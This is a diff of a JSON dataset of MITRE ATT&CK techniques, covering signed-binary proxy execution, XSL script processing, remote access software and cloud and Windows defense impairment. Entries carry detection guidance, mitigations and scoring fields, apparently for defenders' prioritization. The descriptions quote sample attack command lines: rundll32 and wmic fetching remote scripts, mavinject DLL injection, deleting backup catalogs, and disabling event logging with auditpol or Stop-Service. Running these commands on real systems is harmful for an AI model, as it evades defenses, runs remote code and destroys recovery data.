-                "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)",
-                "detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.",
+                "tid": "T1562.007",
+                "name": "Impair Defenses: Disable or Modify Cloud Firewall",
+                "url": "https://attack.mitre.org/techniques/T1562/007",
+                "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+                "detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.",
                 "mitigations": [
                     {
-                        "mid": "M1050",
-                        "name": "Exploit Protection",
-                        "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                        "url": "https://attack.mitre.org/mitigations/M1050"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.012",
-                "name": "Signed Binary Proxy Execution: Verclsid",
-                "url": "https://attack.mitre.org/techniques/T1218/012",
-                "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ",
-                "detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.",
+                "tid": "T1562.008",
+                "name": "Impair Defenses: Disable Cloud Logs",
+                "url": "https://attack.mitre.org/techniques/T1562/008",
+                "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)",
+                "detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs)  In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1218.013",
-                "name": "Signed Binary Proxy Execution: Mavinject",
-                "url": "https://attack.mitre.org/techniques/T1218/013",
-                "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
-                "detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.",
+                "tid": "T1562.009",
+                "name": "Impair Defenses: Safe Mode Boot",
+                "url": "https://attack.mitre.org/techniques/T1562/009",
+                "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)",
+                "detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
                     }
                 ]
             },
             {
-                "tid": "T1218.014",
-                "name": "Signed Binary Proxy Execution: MMC",
-                "url": "https://attack.mitre.org/techniques/T1218/014",
-                "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)",
-                "detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ",
+                "tid": "T1562.010",
+                "name": "Impair Defenses: Downgrade Attack",
+                "url": "https://attack.mitre.org/techniques/T1562/010",
+                "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\n\nAdversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)",
+                "detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.",
                 "mitigations": [
                     {
                         "mid": "M1042",
                         "name": "Disable or Remove Feature or Program",
                         "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
                         "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 1.880952380952381,
-        "adjusted_score": 1.880952380952381,
-        "has_car": false,
+        "cumulative_score": 1.8047619047619048,
+        "adjusted_score": 1.8047619047619048,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "2.3",
-            "2.5",
-            "2.7",
+            "3.3",
             "4.1",
             "4.7",
-            "4.8",
             "5.3",
             "5.4",
             "6.1",
             "6.2",
-            "6.8",
-            "10.5",
-            "18.3",
-            "18.5"
+            "6.8"
         ],
         "nist_controls": [
             "AC-2",
@@ -10247,16 +33082,14 @@
             "AC-5",
             "AC-6",
             "CA-7",
-            "CM-11",
+            "CA-8",
             "CM-2",
             "CM-5",
             "CM-6",
             "CM-7",
-            "CM-8",
             "IA-2",
+            "IA-4",
             "RA-5",
-            "SI-10",
-            "SI-16",
             "SI-3",
             "SI-4",
             "SI-7"
@@ -10264,341 +33097,291 @@
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.780952380952381,
-            "mitigation_score": 0.5818181818181818,
+            "combined_score": 0.7047619047619047,
+            "mitigation_score": 0.43636363636363634,
             "detection_score": 1
         },
         "choke_point_score": 0.1,
         "prevalence_score": 1
     },
     {
-        "tid": "T1219",
-        "name": "Remote Access Software",
-        "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
-        "url": "https://attack.mitre.org/techniques/T1219",
+        "tid": "T1562.001",
+        "name": "Impair Defenses: Disable or Modify Tools",
+        "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)",
+        "url": "https://attack.mitre.org/techniques/T1562/001",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion"
         ],
-        "detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
+        "detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.",
         "platforms": [
+            "Containers",
+            "IaaS",
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Process: Process Creation"
+            "Command: Command Execution",
+            "Process: Process Termination",
+            "Sensor Health: Host Status",
+            "Service: Service Metadata",
+            "Windows Registry: Windows Registry Key Deletion",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             },
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.935645650952381,
-        "adjusted_score": 0.935645650952381,
-        "has_car": false,
+        "cumulative_score": 0.37142857142857144,
+        "adjusted_score": 0.37142857142857144,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "2.5",
-            "4.2",
-            "4.4",
-            "7.6",
-            "9.3",
-            "13.3",
-            "13.4",
-            "13.8",
-            "18.2",
-            "18.3"
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
         "nist_controls": [
-            "AC-17",
+            "AC-2",
             "AC-3",
-            "AC-4",
+            "AC-5",
+            "AC-6",
             "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
+            "IA-2",
             "SI-3",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.38095238095238093,
-            "mitigation_score": 0.41818181818181815,
-            "detection_score": 0.34
-        },
-        "choke_point_score": 0.55,
-        "prevalence_score": 0.00469327
+        "hardware_coverage": true
     },
     {
-        "tid": "T1220",
-        "name": "XSL Script Processing",
-        "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”",
-        "url": "https://attack.mitre.org/techniques/T1220",
+        "tid": "T1562.002",
+        "name": "Impair Defenses: Disable Windows Event Logging",
+        "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
+        "url": "https://attack.mitre.org/techniques/T1562/002",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
+        "detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "Module: Module Load",
-            "Process: Process Creation"
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Script: Script Execution",
+            "Sensor Health: Host Status",
+            "Windows Registry: Windows Registry Key Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.2357564142857143,
-        "adjusted_score": 0.2357564142857143,
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.5",
-            "2.7"
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "SI-10",
+            "IA-2",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
